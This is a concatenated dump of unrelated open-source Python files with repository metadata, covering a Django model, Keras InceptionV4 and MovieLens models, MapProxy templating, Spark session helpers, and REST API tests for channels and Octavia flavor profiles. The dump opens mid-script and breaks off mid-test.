builder.build_exe() # elif 'rdp' in argv: # builder.build_rdp() elif 'installer' in argv: builder.build_installer() if __name__ == '__main__': try: main() except KeyboardInterrupt: pass except RuntimeError as e: cc.e(e.__str__()) except: cc.f('got exception.')
41.782051
149
0.615935
2c31f439e5d1a4880464007ba2fe3ff47e96aaa7
455
py
Python
testproj/people/models.py
gdalmau/drf-yasg
acff90ac26eba01e363bfd3ecc75b71a6a37088a
[ "BSD-3-Clause" ]
65
2020-10-06T15:37:49.000Z
2022-02-24T05:18:28.000Z
testproj/people/models.py
gdalmau/drf-yasg
acff90ac26eba01e363bfd3ecc75b71a6a37088a
[ "BSD-3-Clause" ]
48
2020-10-07T11:14:40.000Z
2021-02-03T15:07:39.000Z
testproj/people/models.py
gdalmau/drf-yasg
acff90ac26eba01e363bfd3ecc75b71a6a37088a
[ "BSD-3-Clause" ]
4
2020-10-10T18:03:33.000Z
2020-10-23T07:56:34.000Z
from django.db import models from django.utils.safestring import mark_safe class Identity(models.Model): first_name = models.CharField(max_length=30, null=True) last_name = models.CharField( max_length=30, null=True, help_text=mark_safe("<strong>Here's some HTML!</strong>"), ) class Person(models.Model): identity = models.OneToOneField( Identity, related_name="person", on_delete=models.PROTECT )
25.277778
66
0.696703
44885e97fba996d73ce0ac7c398d95e567adefc2
662
py
Python
Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py
yWolfBR/Python-CursoEmVideo
17bab8ad3c4293daf8377c5d49242942845b3577
[ "MIT" ]
null
null
null
Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py
yWolfBR/Python-CursoEmVideo
17bab8ad3c4293daf8377c5d49242942845b3577
[ "MIT" ]
null
null
null
Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py
yWolfBR/Python-CursoEmVideo
17bab8ad3c4293daf8377c5d49242942845b3577
[ "MIT" ]
null
null
null
def showline(): return '-' * 50 def header(txt): print(f'{showline()}\n{txt:^50}\n{showline()}') def leiaint(txt): while True: try: n = int(input(txt)) except (ValueError, TypeError): print('ERRO! Digite um número inteiro válido!') except KeyboardInterrupt: print('O usuário preferiu não digitar') return 0 else: return n def leiastr(txt): t = str(input(txt)).strip() return t def cmenu(lst): header('MENU PRINCIPAL') for i, v in enumerate(lst): print(f'{i + 1} - {v}') print(showline()) return leiaint('Sua Opção: ')
20.060606
59
0.542296
bb624269990a68189f4fef67b8b4425a7155e2d9
9,847
py
Python
inceptionv4.py
theroyakash/InceptionV4
ba21f3246503fe40343bea599ad5f94755fc1b65
[ "Apache-2.0" ]
null
null
null
inceptionv4.py
theroyakash/InceptionV4
ba21f3246503fe40343bea599ad5f94755fc1b65
[ "Apache-2.0" ]
null
null
null
inceptionv4.py
theroyakash/InceptionV4
ba21f3246503fe40343bea599ad5f94755fc1b65
[ "Apache-2.0" ]
null
null
null
''' Copyright 2020 TensorFlow Authors and theroyakash Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import numpy as np import tensorFlow as tf from tensorFlow import keras # Sys import warnings # Keras Core from keras.layers.convolutional import MaxPooling2D, Convolution2D, AveragePooling2D from keras.layers import Input, Dropout, Dense, Flatten, Activation from keras.layers.normalization import BatchNormalization from keras.layers.merge import concatenate from keras import regularizers from keras import initializers from keras.models import Model # Backend from keras import backend as K # Utils from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file # Implements the Inception Network v4 (http://arxiv.org/pdf/1602.07261v1.pdf) in Keras. WEIGHTS_PATH = 'data coming soon' WEIGHTS_PATH_NO_TOP = 'link coming soon' def preprocess_input(x): x = np.divide(x, 255.0) x = np.subtract(x, 0.5) x = np.multiply(x, 2.0) return x def conv2d_bn(x, nb_filter, num_row, num_col, padding='same', strides=(1, 1), use_bias=False): """ Utility function to apply conv + BN. (Slightly modified from https://github.com/fchollet/keras/blob/master/keras/applications/inception_v3.py) """ if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 x = Convolution2D(nb_filter, (num_row, num_col), strides=strides, padding=padding, use_bias=use_bias, kernel_regularizer=regularizers.l2(0.00004), kernel_initializer=initializers.VarianceScaling(scale=2.0, mode='fan_in', distribution='normal', seed=None))(x) x = BatchNormalization(axis=channel_axis, momentum=0.9997, scale=False)(x) x = Activation('relu')(x) return x def block_inception_a(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 branch_0 = conv2d_bn(input, 96, 1, 1) branch_1 = conv2d_bn(input, 64, 1, 1) branch_1 = conv2d_bn(branch_1, 96, 3, 3) branch_2 = conv2d_bn(input, 64, 1, 1) branch_2 = conv2d_bn(branch_2, 96, 3, 3) branch_2 = conv2d_bn(branch_2, 96, 3, 3) branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input) branch_3 = conv2d_bn(branch_3, 96, 1, 1) x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis) return x def block_reduction_a(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 branch_0 = conv2d_bn(input, 384, 3, 3, strides=(2,2), padding='valid') branch_1 = conv2d_bn(input, 192, 1, 1) branch_1 = conv2d_bn(branch_1, 224, 3, 3) branch_1 = conv2d_bn(branch_1, 256, 3, 3, strides=(2,2), padding='valid') branch_2 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(input) x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis) return x def block_inception_b(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 branch_0 = conv2d_bn(input, 384, 1, 1) branch_1 = conv2d_bn(input, 192, 1, 1) branch_1 = conv2d_bn(branch_1, 224, 1, 7) branch_1 = conv2d_bn(branch_1, 256, 7, 1) branch_2 = conv2d_bn(input, 192, 1, 1) branch_2 = conv2d_bn(branch_2, 192, 7, 1) branch_2 = conv2d_bn(branch_2, 224, 1, 7) branch_2 = conv2d_bn(branch_2, 224, 7, 1) branch_2 = conv2d_bn(branch_2, 256, 1, 7) branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input) branch_3 = conv2d_bn(branch_3, 128, 1, 1) x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis) return x def block_reduction_b(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 branch_0 = conv2d_bn(input, 192, 1, 1) branch_0 = conv2d_bn(branch_0, 192, 3, 3, strides=(2, 2), padding='valid') branch_1 = conv2d_bn(input, 256, 1, 1) branch_1 = conv2d_bn(branch_1, 256, 1, 7) branch_1 = conv2d_bn(branch_1, 320, 7, 1) branch_1 = conv2d_bn(branch_1, 320, 3, 3, strides=(2,2), padding='valid') branch_2 = MaxPooling2D((3, 3), strides=(2, 2), padding='valid')(input) x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis) return x def block_inception_c(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 branch_0 = conv2d_bn(input, 256, 1, 1) branch_1 = conv2d_bn(input, 384, 1, 1) branch_10 = conv2d_bn(branch_1, 256, 1, 3) branch_11 = conv2d_bn(branch_1, 256, 3, 1) branch_1 = concatenate([branch_10, branch_11], axis=channel_axis) branch_2 = conv2d_bn(input, 384, 1, 1) branch_2 = conv2d_bn(branch_2, 448, 3, 1) branch_2 = conv2d_bn(branch_2, 512, 1, 3) branch_20 = conv2d_bn(branch_2, 256, 1, 3) branch_21 = conv2d_bn(branch_2, 256, 3, 1) branch_2 = concatenate([branch_20, branch_21], axis=channel_axis) branch_3 = AveragePooling2D((3, 3), strides=(1, 1), padding='same')(input) branch_3 = conv2d_bn(branch_3, 256, 1, 1) x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis) return x def inception_v4_base(input): if K.image_data_format() == 'channels_first': channel_axis = 1 else: channel_axis = -1 # Input Shape is 299 x 299 x 3 (th) or 3 x 299 x 299 (th) net = conv2d_bn(input, 32, 3, 3, strides=(2,2), padding='valid') net = conv2d_bn(net, 32, 3, 3, padding='valid') net = conv2d_bn(net, 64, 3, 3) branch_0 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net) branch_1 = conv2d_bn(net, 96, 3, 3, strides=(2,2), padding='valid') net = concatenate([branch_0, branch_1], axis=channel_axis) branch_0 = conv2d_bn(net, 64, 1, 1) branch_0 = conv2d_bn(branch_0, 96, 3, 3, padding='valid') branch_1 = conv2d_bn(net, 64, 1, 1) branch_1 = conv2d_bn(branch_1, 64, 1, 7) branch_1 = conv2d_bn(branch_1, 64, 7, 1) branch_1 = conv2d_bn(branch_1, 96, 3, 3, padding='valid') net = concatenate([branch_0, branch_1], axis=channel_axis) branch_0 = conv2d_bn(net, 192, 3, 3, strides=(2,2), padding='valid') branch_1 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net) net = concatenate([branch_0, branch_1], axis=channel_axis) # 35 x 35 x 384 # 4 x Inception-A blocks for idx in range(4): net = block_inception_a(net) # 35 x 35 x 384 # Reduction-A block net = block_reduction_a(net) # 17 x 17 x 1024 # 7 x Inception-B blocks for idx in range(7): net = block_inception_b(net) # 17 x 17 x 1024 # Reduction-B block net = block_reduction_b(net) # 8 x 8 x 1536 # 3 x Inception-C blocks for idx in range(3): net = block_inception_c(net) return net def inception_v4(num_classes, dropout_keep_prob, weights, include_top): ''' Creates the inception v4 network Args: num_classes: number of classes dropout_keep_prob: float, the fraction to keep before final layer. Returns: logits: the logits outputs of the model. ''' # Input Shape is 299 x 299 x 3 (tf) or 3 x 299 x 299 (th) if K.image_data_format() == 'channels_first': inputs = Input((3, 299, 299)) else: inputs = Input((299, 299, 3)) # Make inception base x = inception_v4_base(inputs) # Final pooling and prediction if include_top: # 1 x 1 x 1536 x = AveragePooling2D((8,8), padding='valid')(x) x = Dropout(dropout_keep_prob)(x) x = Flatten()(x) # 1536 x = Dense(units=num_classes, activation='softmax')(x) model = Model(inputs, x, name='inception_v4') # load weights if weights == 'imagenet': if K.image_data_format() == 'channels_first': if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image data format convention ' '(`image_data_format="channels_first"`). ' 'For best performance, set ' '`image_data_format="channels_last"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') if include_top: weights_path = get_file( 'inception-v4_weights_tf_dim_ordering_tf_kernels.h5', WEIGHTS_PATH, cache_subdir='models', md5_hash='9fe79d77f793fe874470d84ca6ba4a3b') else: weights_path = get_file( 'inception-v4_weights_tf_dim_ordering_tf_kernels_notop.h5', WEIGHTS_PATH_NO_TOP, cache_subdir='models', md5_hash='9296b46b5971573064d12e4669110969') model.load_weights(weights_path, by_name=True) return model def create_model(num_classes=1001, dropout_prob=0.2, weights=None, include_top=True): return inception_v4(num_classes, dropout_prob, weights, include_top)
32.391447
133
0.643242
d54673b297fc0493bc7cb50661d05eecdfcc3a7a
2,055
py
Python
inttests/channel_routes_test.py
andrew-boutin/dndtextapi
4af1af9b9424baf64f7f45db394467e8344ae21e
[ "RSA-MD" ]
3
2018-07-26T12:48:12.000Z
2018-08-16T01:00:05.000Z
inttests/channel_routes_test.py
andrew-boutin/dndtextapi
4af1af9b9424baf64f7f45db394467e8344ae21e
[ "RSA-MD" ]
null
null
null
inttests/channel_routes_test.py
andrew-boutin/dndtextapi
4af1af9b9424baf64f7f45db394467e8344ae21e
[ "RSA-MD" ]
null
null
null
# Copyright (C) 2018, Baking Bits Studios - All Rights Reserved import requests, json from base import TestBase # TODO: Created, Delete class TestChannelRoutes(TestBase): def setup_method(self, test_method): super(TestChannelRoutes, self).setup_method(test_method) self.url = f"{self.base}/channels" def teardown_method(self, test_method): super(TestChannelRoutes, self).teardown_method(test_method) def test_get_channels(self): cookies = self.get_authn_cookies_user_normal() r = requests.get(self.url, headers=self.read_headers, cookies=cookies) assert 200 == r.status_code # TODO: At least one, verify fields, etc. # [{"Name":"my public channel","Description":"my public channel description","Topic":"some topic","ID":1,"OwnerID":1,"IsPrivate":false,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1},{"Name":"my private channel","Description":"my private channel description","Topic":"","ID":2,"OwnerID":1,"IsPrivate":true,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1}] def test_update_channel(self, create_channel_normal_user): cookies = self.get_authn_cookies_user_normal() channel_id = create_channel_normal_user['ID'] url = self.url + f'/{channel_id}' data = create_channel_normal_user data['Topic'] = 'Updated topic' data = json.dumps(data) r = requests.put(url, data=data, headers=self.read_write_headers, cookies=cookies) assert 200 == r.status_code assert 'Updated topic' == r.json()['Topic'] def test_get_channel(self, create_channel_normal_user): cookies = self.get_authn_cookies_user_normal() channel_id = create_channel_normal_user['ID'] url = self.url + f'/{channel_id}' r = requests.get(url, cookies=cookies) assert 200 == r.status_code assert channel_id == r.json()['ID']
41.938776
458
0.665693
4a515836d1175cb1ec0a8c559bb5981b822f8f76
3,111
py
Python
uncertainty_baselines/models/movielens.py
athon-millane/uncertainty-baselines
aa504fc51aac6d4cac47dbd34aa672c670dfbd28
[ "Apache-2.0" ]
2
2022-02-22T10:22:46.000Z
2022-03-09T09:22:41.000Z
uncertainty_baselines/models/movielens.py
PGM-Lab/2022-AISTATS-diversity
63df2e5f29cdaefe49626439bbe13289f37eed36
[ "Apache-2.0" ]
null
null
null
uncertainty_baselines/models/movielens.py
PGM-Lab/2022-AISTATS-diversity
63df2e5f29cdaefe49626439bbe13289f37eed36
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright 2020 The Uncertainty Baselines Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """TF Keras model for an MLP for Criteo, from arxiv.org/abs/1906.02530.""" from typing import Any, Dict, List import tensorflow as tf # Model hyperparameters. _CATEGORICAL_BUCKET_DICT = { 'user_id': 6041, 'movie_id': 3953, } _CATEGORICAL_EMBED_DIM = { 'user_id': 8, 'movie_id': 8, } _LAYER_SIZES = [50, 20, 10] def _make_input_layers(batch_size: int) -> Dict[str, tf.keras.layers.Input]: """Defines an input layer for tf.keras model with int32 and string dtypes.""" # TODO(chenzhe): Add more user and movie related features as inputs. Currently # only used movie_id and user_id as the input features. out = { 'movie_id': tf.keras.layers.Input( [], batch_size=batch_size, dtype=tf.string, name='movie_id'), 'user_id': tf.keras.layers.Input( [], batch_size=batch_size, dtype=tf.string, name='user_id') } return out # In order to get better typing we would need to be able to reference the # FeatureColumn class defined here, but it is not exported: # https://github.com/tensorflow/tensorflow/blob/v2.1.0/tensorflow/python/feature_column/feature_column_v2.py#L2121. def _make_feature_columns() -> List[Any]: """Build feature_columns for converting features to a dense vector.""" categorical_feature_columns = [] # TODO(chenzhe): Add more user and movie related features as inputs. Currently # only used movie_id and user_id as the input features. categorical_feature_arr = ['user_id', 'movie_id'] for name in categorical_feature_arr: feature_col = tf.feature_column.categorical_column_with_hash_bucket( name, _CATEGORICAL_BUCKET_DICT[name]) categorical_feature_columns.append( tf.feature_column.embedding_column( feature_col, _CATEGORICAL_EMBED_DIM[name])) return categorical_feature_columns def create_model( batch_size: int, **unused_kwargs: Dict[str, Any]) -> tf.keras.models.Model: """Creates a tf.keras.Model fully connected model for MovieLens.""" categorical_feature_columns = _make_feature_columns() input_layer = _make_input_layers(batch_size) categorical_features = tf.keras.layers.DenseFeatures( categorical_feature_columns)(input_layer) x = tf.keras.layers.BatchNormalization()(categorical_features) for size in _LAYER_SIZES: x = tf.keras.layers.Dense(size, activation='relu')(x) logits = tf.keras.layers.Dense(1)(x) return tf.keras.models.Model( inputs=input_layer, outputs=logits, name='movielens_mlp')
36.6
115
0.738669
b6009e0f3bf594da238530174d55b94f3f898959
1,515
py
Python
mapproxy/template.py
gongzhengkun/mapproxy
3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
mapproxy/template.py
gongzhengkun/mapproxy
3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
mapproxy/template.py
gongzhengkun/mapproxy
3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
# This file is part of the MapProxy project. # Copyright (C) 2010 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Loading of template files (e.g. capability documents) """ import os import pkg_resources from mapproxy.util.ext.tempita import Template, bunch from mapproxy.config.config import base_config __all__ = ['Template', 'bunch', 'template_loader'] def template_loader(module_name, location='templates', namespace={}): class loader(object): def __call__(self, name, from_template=None, default_inherit=None): if base_config().template_dir: template_file = os.path.join(base_config().template_dir, name) else: template_file = pkg_resources.resource_filename(module_name, location + '/' + name) return Template.from_filename(template_file, namespace=namespace, encoding='utf-8', default_inherit=default_inherit, get_template=self) return loader()
39.868421
99
0.712211
300fee021fbfe91811b33498b026b2b0cdb1033f
2,843
py
Python
sparklanes/_framework/spark.py
ksbg/sparklanes
0e5fc04a5de46f070213b64319ea6982e28e16da
[ "MIT" ]
15
2018-06-11T08:08:06.000Z
2022-03-26T00:11:38.000Z
sparklanes/_framework/spark.py
ksbg/pyspark-etl
0e5fc04a5de46f070213b64319ea6982e28e16da
[ "MIT" ]
10
2019-01-31T03:37:16.000Z
2021-06-01T22:29:02.000Z
sparklanes/_framework/spark.py
ksbg/pyspark-etl
0e5fc04a5de46f070213b64319ea6982e28e16da
[ "MIT" ]
6
2018-07-05T10:00:19.000Z
2019-10-13T13:40:52.000Z
"""Used to allow sharing of SparkContext and SparkSession, to avoid having to "getOrCreate" them again and again for each task. This way, they can just be imported and used right away.""" # pylint: disable=invalid-name,too-many-arguments from pyspark import SparkContext, PickleSerializer, BasicProfiler from pyspark.sql import SparkSession from six import PY2 from sparklanes._framework.env import INIT_SPARK_ON_IMPORT, SPARK_APP_NAME class SparkContextAndSessionContainer(object): """Container class holding SparkContext and SparkSession instances, so that any changes will be propagated across the application""" sc = None spark = None def __new__(cls, *args, **kwargs): if cls is SparkContextAndSessionContainer: raise TypeError('SparkSession & SparkContext container class may not be instantiated.') return object.__new__(cls, *args, **kwargs) if PY2 else object.__new__(cls) @classmethod def set_sc(cls, master=None, appName=None, sparkHome=None, pyFiles=None, environment=None, batchSize=0, serializer=PickleSerializer(), conf=None, gateway=None, jsc=None, profiler_cls=BasicProfiler): """Creates and initializes a new `SparkContext` (the old one will be stopped). Argument signature is copied from `pyspark.SparkContext <https://spark.apache.org/docs/latest/api/python/pyspark.html#pyspark.SparkContext>`_. """ if cls.sc is not None: cls.sc.stop() cls.sc = SparkContext(master, appName, sparkHome, pyFiles, environment, batchSize, serializer, conf, gateway, jsc, profiler_cls) cls.__init_spark() @classmethod def set_spark(cls, master=None, appName=None, conf=None, hive_support=False): """Creates and initializes a new `SparkSession`. Argument signature is copied from `pyspark.sql.SparkSession <https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.SparkSession>`_. """ sess = SparkSession.builder if master: sess.master(master) if appName: sess.appName(appName) if conf: sess.config(conf=conf) if hive_support: sess.enableHiveSupport() cls.spark = sess.getOrCreate() @classmethod def init_default(cls): """Create and initialize a default SparkContext and SparkSession""" cls.__init_sc() cls.__init_spark() @classmethod def __init_sc(cls): cls.sc = SparkContext(appName=SPARK_APP_NAME).getOrCreate() @classmethod def __init_spark(cls): cls.spark = SparkSession.builder.appName(SPARK_APP_NAME).getOrCreate() if INIT_SPARK_ON_IMPORT: SparkContextAndSessionContainer.init_default()
38.945205
102
0.679212
f9cd1cbf523d65394631a8c524ee17978f942137
29,034
py
Python
octavia/tests/functional/api/v2/test_flavor_profiles.py
mauroseb/octavia
8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7
[ "Apache-2.0" ]
null
null
null
octavia/tests/functional/api/v2/test_flavor_profiles.py
mauroseb/octavia
8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7
[ "Apache-2.0" ]
null
null
null
octavia/tests/functional/api/v2/test_flavor_profiles.py
mauroseb/octavia
8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7
[ "Apache-2.0" ]
null
null
null
# Copyright 2017 Walmart Stores Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from oslo_config import cfg from oslo_config import fixture as oslo_fixture from oslo_db import exception as odb_exceptions from oslo_utils import uuidutils from octavia.common import constants import octavia.common.context from octavia.tests.functional.api.v2 import base class TestFlavorProfiles(base.BaseAPITest): root_tag = 'flavorprofile' root_tag_list = 'flavorprofiles' root_tag_links = 'flavorprofile_links' def _assert_request_matches_response(self, req, resp, **optionals): self.assertTrue(uuidutils.is_uuid_like(resp.get('id'))) self.assertEqual(req.get('name'), resp.get('name')) self.assertEqual(req.get(constants.PROVIDER_NAME), resp.get(constants.PROVIDER_NAME)) self.assertEqual(req.get(constants.FLAVOR_DATA), resp.get(constants.FLAVOR_DATA)) def test_empty_list(self): response = self.get(self.FPS_PATH) api_list = response.json.get(self.root_tag_list) self.assertEqual([], api_list) def test_create(self): fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body) api_fp = response.json.get(self.root_tag) self._assert_request_matches_response(fp_json, api_fp) def test_create_with_missing_name(self): fp_json = {constants.PROVIDER_NAME: 'pr1', constants.FLAVOR_DATA: '{"x": "y"}'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body, status=400) err_msg = ("Invalid input for field/attribute name. Value: " "'None'. Mandatory field missing.") self.assertEqual(err_msg, response.json.get('faultstring')) def test_create_with_missing_provider(self): fp_json = {'name': 'xyz', constants.FLAVOR_DATA: '{"x": "y"}'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body, status=400) err_msg = ("Invalid input for field/attribute provider_name. " "Value: 'None'. Mandatory field missing.") self.assertEqual(err_msg, response.json.get('faultstring')) def test_create_with_missing_flavor_data(self): fp_json = {'name': 'xyz', constants.PROVIDER_NAME: 'pr1'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body, status=400) err_msg = ("Invalid input for field/attribute flavor_data. " "Value: 'None'. Mandatory field missing.") self.assertEqual(err_msg, response.json.get('faultstring')) def test_create_with_empty_flavor_data(self): fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver', constants.FLAVOR_DATA: '{}'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body) api_fp = response.json.get(self.root_tag) self._assert_request_matches_response(fp_json, api_fp) def test_create_with_long_name(self): fp_json = {'name': 'n' * 256, constants.PROVIDER_NAME: 'test1', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(fp_json) self.post(self.FPS_PATH, body, status=400) def test_create_with_long_provider(self): fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'n' * 256, constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(fp_json) self.post(self.FPS_PATH, body, status=400) def test_create_with_long_flavor_data(self): fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'amp', constants.FLAVOR_DATA: 'n' * 4097} body = self._build_body(fp_json) self.post(self.FPS_PATH, body, status=400) def test_create_authorized(self): fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(fp_json) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) project_id = uuidutils.generate_uuid() with mock.patch.object(octavia.common.context.Context, 'project_id', project_id): override_credentials = { 'service_user_id': None, 'user_domain_id': None, 'is_admin_project': True, 'service_project_domain_id': None, 'service_project_id': None, 'roles': ['load-balancer_member'], 'user_id': None, 'is_admin': True, 'service_user_domain_id': None, 'project_domain_id': None, 'service_roles': [], 'project_id': project_id} with mock.patch( "oslo_context.context.RequestContext.to_policy_values", return_value=override_credentials): response = self.post(self.FPS_PATH, body) self.conf.config(group='api_settings', auth_strategy=auth_strategy) api_fp = response.json.get(self.root_tag) self._assert_request_matches_response(fp_json, api_fp) def test_create_not_authorized(self): self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) fp_json = {'name': 'name', constants.PROVIDER_NAME: 'xyz', constants.FLAVOR_DATA: '{"x": "y"}'} body = self._build_body(fp_json) response = self.post(self.FPS_PATH, body, status=403) api_fp = response.json self.conf.config(group='api_settings', auth_strategy=auth_strategy) self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp) def test_create_db_failure(self): fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver', constants.FLAVOR_DATA: '{"hello": "world"}'} body = self._build_body(fp_json) with mock.patch("octavia.db.repositories.FlavorProfileRepository." "create") as mock_create: mock_create.side_effect = Exception self.post(self.FPS_PATH, body, status=500) mock_create.side_effect = odb_exceptions.DBDuplicateEntry self.post(self.FPS_PATH, body, status=409) def test_create_with_invalid_json(self): fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver', constants.FLAVOR_DATA: '{hello: "world"}'} body = self._build_body(fp_json) self.post(self.FPS_PATH, body, status=400) def test_get(self): fp = self.create_flavor_profile('name', 'noop_driver', '{"x": "y"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) response = self.get( self.FP_PATH.format( fp_id=fp.get('id'))).json.get(self.root_tag) self.assertEqual('name', response.get('name')) self.assertEqual(fp.get('id'), response.get('id')) def test_get_one_deleted_id(self): response = self.get(self.FP_PATH.format(fp_id=constants.NIL_UUID), status=404) self.assertEqual('Flavor profile {} not found.'.format( constants.NIL_UUID), response.json.get('faultstring')) def test_get_one_fields_filter(self): fp = self.create_flavor_profile('name', 'noop_driver', '{"x": "y"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) response = self.get( self.FP_PATH.format(fp_id=fp.get('id')), params={ 'fields': ['id', constants.PROVIDER_NAME]} ).json.get(self.root_tag) self.assertEqual(fp.get('id'), response.get('id')) self.assertIn(u'id', response) self.assertIn(constants.PROVIDER_NAME, response) self.assertNotIn(u'name', response) self.assertNotIn(constants.FLAVOR_DATA, response) def test_get_authorized(self): fp = self.create_flavor_profile('name', 'noop_driver', '{"x": "y"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) project_id = uuidutils.generate_uuid() with mock.patch.object(octavia.common.context.Context, 'project_id', project_id): override_credentials = { 'service_user_id': None, 'user_domain_id': None, 'is_admin_project': True, 'service_project_domain_id': None, 'service_project_id': None, 'roles': ['load-balancer_member'], 'user_id': None, 'is_admin': True, 'service_user_domain_id': None, 'project_domain_id': None, 'service_roles': [], 'project_id': project_id} with mock.patch( "oslo_context.context.RequestContext.to_policy_values", return_value=override_credentials): response = self.get( self.FP_PATH.format( fp_id=fp.get('id'))).json.get(self.root_tag) self.conf.config(group='api_settings', auth_strategy=auth_strategy) self.assertEqual('name', response.get('name')) self.assertEqual(fp.get('id'), response.get('id')) def test_get_not_authorized(self): fp = self.create_flavor_profile('name', 'noop_driver', '{"x": "y"}') self.assertTrue(uuidutils.is_uuid_like(fp.get('id'))) self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF)) auth_strategy = self.conf.conf.api_settings.get('auth_strategy') self.conf.config(group='api_settings', auth_strategy=constants.TESTING) self.get(self.FP_PATH.format(fp_id=fp.get('id')), status=403) self.conf.config(group='api_settings', auth_strategy=auth_strategy) def test_get_all(self): fp1 = self.create_flavor_profile('test1', 'noop_driver', '{"image": "ubuntu"}') ref_fp_1 = {u'flavor_data': u'{"image": "ubuntu"}', u'id': fp1.get('id'), u'name': u'test1', constants.PROVIDER_NAME: u'noop_driver'} self.assertTrue(uuidutils.is_uuid_like(fp1.get('id'))) fp2 = self.create_flavor_profile('test2', 'noop_driver-alt', '{"image": "ubuntu"}') ref_fp_2 = {u'flavor_data': u'{"image": "ubuntu"}', u'id': fp2.get('id'), u'name': u'test2', constants.PROVIDER_NAME: u'noop_driver-alt'} self.assertTrue(uuidutils.is_uuid_like(fp2.get('id'))) response = self.get(self.FPS_PATH) api_list = response.json.get(self.root_tag_list) self.assertEqual(2, len(api_list)) self.assertIn(ref_fp_1, api_list) 